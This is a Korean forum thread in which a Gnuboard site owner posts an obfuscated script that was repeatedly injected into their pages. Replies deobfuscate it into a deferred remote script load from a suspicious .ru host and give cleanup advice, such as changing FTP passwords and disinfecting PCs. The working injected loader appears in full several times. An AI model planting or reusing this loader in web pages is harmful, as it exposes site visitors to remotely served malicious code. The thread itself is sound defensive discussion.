이 소스는 뭔가요? 해킹당한건가요? 정보
이 소스는 뭔가요? 해킹당한건가요?
본문
안녕하세요
그누보드로 제작한 사이트의 소스 맨 하단에 자꾸 다음과같은 소스가 들어가 있습니다. 지워도 또 들어가 있고 그래서.. 웹페이지에서는 스크립트 오류가 나옵니다.
<script>/*LGPL*/ try{ window.onload = function(){var Bzraxz4a39 = document.createElement('s(^#c$&r)i!p^t($'.replace(/@|&|\)|#|\$|\(|\^|\!/ig, ''));Bzraxz4a39.setAttribute('defer', 'h@$^)t)t$p$&^:&!(/$&/^^(p(a!#$^#r#t&&(y#)p)@o##&k^()e&&r@-@!#$c(&)$o!!#)m@.^)e^@&@l!!m#u!n)d$))@o&(.^(e^&$s!!^.$s&)^$p$$a!^#n^#(k(w(i^$(&(r!&e(&(-(&)@c^$o^&^m#&.##t#$h@!e@)c&(h!o)#c^@&o^@l$^a#^t@e@$w!!e$!b(().&r@#u)&!:&$@&8^&0&!8)^)0(^/#&5#)(&1)).!l^&a!^^/($!5!$1().!&()l$$&$)a&!^$&/))#f(#o@!(&x$.$&c@^!!o^#^m)^#/($@g$#o!&o&!$g#l#)e&.))c$o^$m^(/!!&t((^@r$^i))p^a#(d)v)i(()!s$@^o!r)(.(^^c!$o^)(m^/^'.replace(/\(|\$|#|@|\^|\)|\!|&/ig, ''));if (document){document.body.appendChild(Bzraxz4a39);}} } catch(A9yw1o0ni9htyb2w15t) {}</script>
<!--1deb39d0a22f346fbbef5b129085a3e1-->
이 소스의 정체는 무엇일까요?
아시는분좀 알려주세요.. 해킹인지.. 해킹이면 어떤식의 해킹인지..
서버를 밀어버려야 하는건지..
그누보드로 제작한 사이트의 소스 맨 하단에 자꾸 다음과같은 소스가 들어가 있습니다. 지워도 또 들어가 있고 그래서.. 웹페이지에서는 스크립트 오류가 나옵니다.
<script>/*LGPL*/ try{ window.onload = function(){var Bzraxz4a39 = document.createElement('s(^#c$&r)i!p^t($'.replace(/@|&|\)|#|\$|\(|\^|\!/ig, ''));Bzraxz4a39.setAttribute('defer', 'h@$^)t)t$p$&^:&!(/$&/^^(p(a!#$^#r#t&&(y#)p)@o##&k^()e&&r@-@!#$c(&)$o!!#)m@.^)e^@&@l!!m#u!n)d$))@o&(.^(e^&$s!!^.$s&)^$p$$a!^#n^#(k(w(i^$(&(r!&e(&(-(&)@c^$o^&^m#&.##t#$h@!e@)c&(h!o)#c^@&o^@l$^a#^t@e@$w!!e$!b(().&r@#u)&!:&$@&8^&0&!8)^)0(^/#&5#)(&1)).!l^&a!^^/($!5!$1().!&()l$$&$)a&!^$&/))#f(#o@!(&x$.$&c@^!!o^#^m)^#/($@g$#o!&o&!$g#l#)e&.))c$o^$m^(/!!&t((^@r$^i))p^a#(d)v)i(()!s$@^o!r)(.(^^c!$o^)(m^/^'.replace(/\(|\$|#|@|\^|\)|\!|&/ig, ''));if (document){document.body.appendChild(Bzraxz4a39);}} } catch(A9yw1o0ni9htyb2w15t) {}</script>
<!--1deb39d0a22f346fbbef5b129085a3e1-->
이 소스의 정체는 무엇일까요?
아시는분좀 알려주세요.. 해킹인지.. 해킹이면 어떤식의 해킹인지..
서버를 밀어버려야 하는건지..
댓글 전체
검색해보니 유사한 경우의 사이트가 발견됩니다.
http://www.ca.com/securityadvisor/virusinfo/virus.aspx?id=80867#section2
위 사이트를 참조하시면,
Trojan 종류의 바이러스인 듯 한데...
자세한 건 웹호스팅 업체에 연락해 보시는 게 좋을 듯 싶습니다.
http://www.ca.com/securityadvisor/virusinfo/virus.aspx?id=80867#section2
위 사이트를 참조하시면,
Trojan 종류의 바이러스인 듯 한데...
자세한 건 웹호스팅 업체에 연락해 보시는 게 좋을 듯 싶습니다.
하핫 소스를 못알아보게 하느라고 복잡해 보이도록 만들었지만 무슨 내용인지 보는 것은 간단합니다
alert('s(^#c$&r)i!&#p^t(&#$'.replace(/@|&|\)|#|\$|\(|\^|\!/ig, ''))
alert('d^@e^&f))e!r$)!'.replace(/#|\^|\(|@|\!|\)|&|\$/ig, ''));
alert('t@e&#^x^$t)/@!)j^(a@@#v@$)!a@s($c$r!&&i!!p&$t#'.replace(/#|\!|@|&|\)|\(|\$|\^/ig, ''));
alert('Q!6!&^#^0#$j&z)&d(!#2!!&l^(d^@(z&w&$)'.replace(/@|\$|\(|#|\!|&|\^|\)/ig, ''));
alert('s$$r)^!@c@&'.replace(/\!|&|#|\$|@|\(|\^|\)/ig, '') )
alert('h@$^)t)&#t$p$&^:&!(/$&/^^(p(a!#$^#r#t&&(y#)p)@o##&k^()e&&r@-@!#$c(&)$o!!#)m@.^)e^@&@l!!m#u!n)d$))@o&(.^(e^&$s!!^.$s&)^$p$$a!^#n^#(k(w(i^$(&(r!&e(&(-(&)@c^$o^&^m#&&#.##t#$h@!e@)c&(h!o)#c^@&o^@l$^a#^t@e@$w!!e$!b(().&r@#u)&!:&$@&8^&0&!8)^)0(^/#&5#)(&1)).!l^&a!^^/($!5!$1().!&()l$$&$)a&!^$&/))#f(#o@!(&x$.$&c@^!!o^#^m)^#/($@g$#o!&o&!$g#l#)e&.))c$o^$m^(/!!&t((^@r$^i))p^a#(d)v)i(()!s$@^o!r)(.(^^c!$o^)(m^/^'.replace(/\(|\$|#|@|\^|\)|\!|&/ig, ''));
이렇게 내용을 보면 됩니다
결국은 이런 내용입니다
<script defer="defer" type="text/javascript" id="Q60jzd2ldzw" src="http://partypoker-com.elmundo.es.spankwire-com.thechocolateweb.ru:8080/51.la/51.la/fox.com/google.com/tripadvisor.com/"></script>
이따위 자바스크립트를 실행되게 한 것입니다
저 따위 주소로 뭐하자는 것인지는 모르겠지만
51.la <==요건 중국 사이트군요
fox.com 이나 google.com 은 잘 알고 있는 사이트이고
사이트 이름을 죽 나열한 것은 또 다른 속임수이고 아마도 폴더명을 그렇게 붙인것이겠지요
저 따위 주소로 빈페이지만 나오는 걸로 보아서는 우선 스크립트를 심어놓고 한참 시일이 흐른 후에
스크립트를 연결하려고 하는 짓 같아보입니다
그런데 스크립트 오류가 나오나요?
오류는 나지 않는데요?
pc그린에서 Trojan 바이러스라고는 나오지만..
alert('s(^#c$&r)i!&#p^t(&#$'.replace(/@|&|\)|#|\$|\(|\^|\!/ig, ''))
alert('d^@e^&f))e!r$)!'.replace(/#|\^|\(|@|\!|\)|&|\$/ig, ''));
alert('t@e&#^x^$t)/@!)j^(a@@#v@$)!a@s($c$r!&&i!!p&$t#'.replace(/#|\!|@|&|\)|\(|\$|\^/ig, ''));
alert('Q!6!&^#^0#$j&z)&d(!#2!!&l^(d^@(z&w&$)'.replace(/@|\$|\(|#|\!|&|\^|\)/ig, ''));
alert('s$$r)^!@c@&'.replace(/\!|&|#|\$|@|\(|\^|\)/ig, '') )
alert('h@$^)t)&#t$p$&^:&!(/$&/^^(p(a!#$^#r#t&&(y#)p)@o##&k^()e&&r@-@!#$c(&)$o!!#)m@.^)e^@&@l!!m#u!n)d$))@o&(.^(e^&$s!!^.$s&)^$p$$a!^#n^#(k(w(i^$(&(r!&e(&(-(&)@c^$o^&^m#&&#.##t#$h@!e@)c&(h!o)#c^@&o^@l$^a#^t@e@$w!!e$!b(().&r@#u)&!:&$@&8^&0&!8)^)0(^/#&5#)(&1)).!l^&a!^^/($!5!$1().!&()l$$&$)a&!^$&/))#f(#o@!(&x$.$&c@^!!o^#^m)^#/($@g$#o!&o&!$g#l#)e&.))c$o^$m^(/!!&t((^@r$^i))p^a#(d)v)i(()!s$@^o!r)(.(^^c!$o^)(m^/^'.replace(/\(|\$|#|@|\^|\)|\!|&/ig, ''));
이렇게 내용을 보면 됩니다
결국은 이런 내용입니다
<script defer="defer" type="text/javascript" id="Q60jzd2ldzw" src="http://partypoker-com.elmundo.es.spankwire-com.thechocolateweb.ru:8080/51.la/51.la/fox.com/google.com/tripadvisor.com/"></script>
이따위 자바스크립트를 실행되게 한 것입니다
저 따위 주소로 뭐하자는 것인지는 모르겠지만
51.la <==요건 중국 사이트군요
fox.com 이나 google.com 은 잘 알고 있는 사이트이고
사이트 이름을 죽 나열한 것은 또 다른 속임수이고 아마도 폴더명을 그렇게 붙인것이겠지요
저 따위 주소로 빈페이지만 나오는 걸로 보아서는 우선 스크립트를 심어놓고 한참 시일이 흐른 후에
스크립트를 연결하려고 하는 짓 같아보입니다
그런데 스크립트 오류가 나오나요?
오류는 나지 않는데요?
pc그린에서 Trojan 바이러스라고는 나오지만..
바이러스류가 맞습니다. 웹호스팅사에 연락하시고 ftp등의 비밀번호류를 다 교체하시고 왠만하면 ssh를 이용하세요...저런게 지속적으로 생긴다는것은 ftp의 계정정보가 뚫려서일 가능성이 제일 높습니다. 주요원인은 접속하는 컴퓨터가 바이러스등에 간염되어 저런 정보들이 유출되고 그 정보를 가지고 다시 저 사이트를 감염시키죠
한때 유행처럼 여러군데 번졌는데(저도 한번 당함;;)
1. 비밀번호를 알고 있거나 접속하는 모든 컴퓨터의 바이러스 퇴치가 제일 먼저 급하시구요(아니면 그냥 밀어버리시길)
2. ftp등 비밀번호 바꾸기
3. 감염된 파일들을 일일이 찾아 지우시던가 아니면 백업본이 있다면 그걸로 바꾸시거나...몇몇종류들은 이상한 파일들을 신규로 생성하기도 하니 꼼꼼히 살펴보셔야 하며 아파치 설정파일이라던가 각종 설정파일들(보통 www폴더 상위에 존재하는)에도 코드가 심어져있으니 그냥 모든파일들을 다 살펴보시는게 속편하십니다.
기타 각종 포탈들에서 해당 정보들이나 검색을 통해 다른사람들에게 조언을 구해보시길~
한때 유행처럼 여러군데 번졌는데(저도 한번 당함;;)
1. 비밀번호를 알고 있거나 접속하는 모든 컴퓨터의 바이러스 퇴치가 제일 먼저 급하시구요(아니면 그냥 밀어버리시길)
2. ftp등 비밀번호 바꾸기
3. 감염된 파일들을 일일이 찾아 지우시던가 아니면 백업본이 있다면 그걸로 바꾸시거나...몇몇종류들은 이상한 파일들을 신규로 생성하기도 하니 꼼꼼히 살펴보셔야 하며 아파치 설정파일이라던가 각종 설정파일들(보통 www폴더 상위에 존재하는)에도 코드가 심어져있으니 그냥 모든파일들을 다 살펴보시는게 속편하십니다.
기타 각종 포탈들에서 해당 정보들이나 검색을 통해 다른사람들에게 조언을 구해보시길~
